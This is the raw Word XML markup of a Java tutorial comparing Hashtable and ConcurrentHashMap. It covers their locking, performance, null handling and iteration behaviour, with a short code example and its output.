            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F80F8A7"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31CFDA9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0E027881"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613E6F50" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1097A53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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24AAD29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Thread-safe (synchronized methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485E35B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Thread-safe (uses fine-grained locking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="15FBE4B6" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334129C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cking Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65EB94D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Synchronizes </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>the entire map</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> on every operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19BA2A7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segment-based locking</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (lock per bucket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="06978C83" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B81C68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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CAADE0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Slower due to </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>global lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02154F8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Faster due to </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>concurrent access</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (multiple threads can read/write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="4EF06F38" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF63B1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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4746708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w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not allow</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="745729E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w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not allow</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="675917DB" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E7969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Concurrency Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6788806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w (single lock for entire map)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AB4060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igh (locks only a part of the map)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="0D0A5FF2" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF5259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teration Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AAF12E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il-fast (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0975F37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eakly consistent (does not throw exception during iteration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="587C2DC8" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620F8B7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ntroduced In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0966828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Java 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CA9C87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Java 1.5 (part of </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java.util.concurrent</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="3BF01614" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF5467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Data Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129D4A4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ynchronized HashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37365F3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ternally uses </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>segment-based hash table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="01041C25" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="048BC73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commended Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="016693E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w concurrency or legacy code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5744AF4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igh-concurrency environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15B879F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pict w14:anchorId="5CB8252E">
          <v:rect id="_x0000_i7347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C510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1. Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E2DE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p w14:paraId="12A41F0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synchronized methods</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D484D0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cks the entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every read/write operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BEEE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Even </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> require the </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, causing performance degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1434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p w14:paraId="78DEEFA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ivides the map into </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments (buckets)</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reduce the scope of locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9DCDD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lock striping</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock only one bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at a time during update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE6CA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ad operations</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not acquire a lock (using </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volatile reads</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CBEBD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Multiple threads can </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read and write</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simultaneously, as long as they work on different segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223330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pict w14:anchorId="1F774E7F">
          <v:rect id="_x0000_i7348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A706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2. Code Example: HashTable vs ConcurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D673B32"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mport java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56B8D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mport java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDFB7A" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA55C6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ublic class HashTableVsConcurrentHashMap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D6902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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6596A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HashTable (Global Lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751D7D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Map&lt;String, Integer&gt; hashTable = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D141A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        hashTable.put("A", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD127B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hashTable.put("B", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE90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HashTable: " + hashTable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819D987" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BB0BE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oncurrentHashMap (Segmented Lock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC45A1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Map&lt;String, Integer&gt; concurrentMap = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFD3A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X", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61289912"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Y", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D851FB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ConcurrentHashMap: " + concurrentMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F1AC2" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F52457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Trying null keys/values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EC60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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4013E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hashTable.put(null, 3);  // Throws NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E49179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atch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B6B4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HashTable does not allow null keys.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE5D3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4E7A5D8B" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47638C8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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51136B5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concurrentMap.put(null, 3);  // Throws NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108CC7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 catch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799869A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System.out.println("ConcurrentHashMap does not allow null keys.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A6B6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7B976E1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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67451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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D364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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD451B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ashTable: {A=1, B=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E822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HashMap: {X=10, Y=20}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3513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HashTable does not allow null keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF259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HashMap does not allow null keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241C25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pict w14:anchorId="3F0B307C">
          <v:rect id="_x0000_i7349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC924BA"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3. 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2909"/>
        <w:gridCol w:w="4646"/>
      </w:tblGrid>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="15F5B372" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0292B1F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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50C2F626"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6269F555"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05577A73" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DF1CFA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ingle-Threaded Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B88FE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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1374DD3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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="32BE9057" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08013DB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Multi-Threaded Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
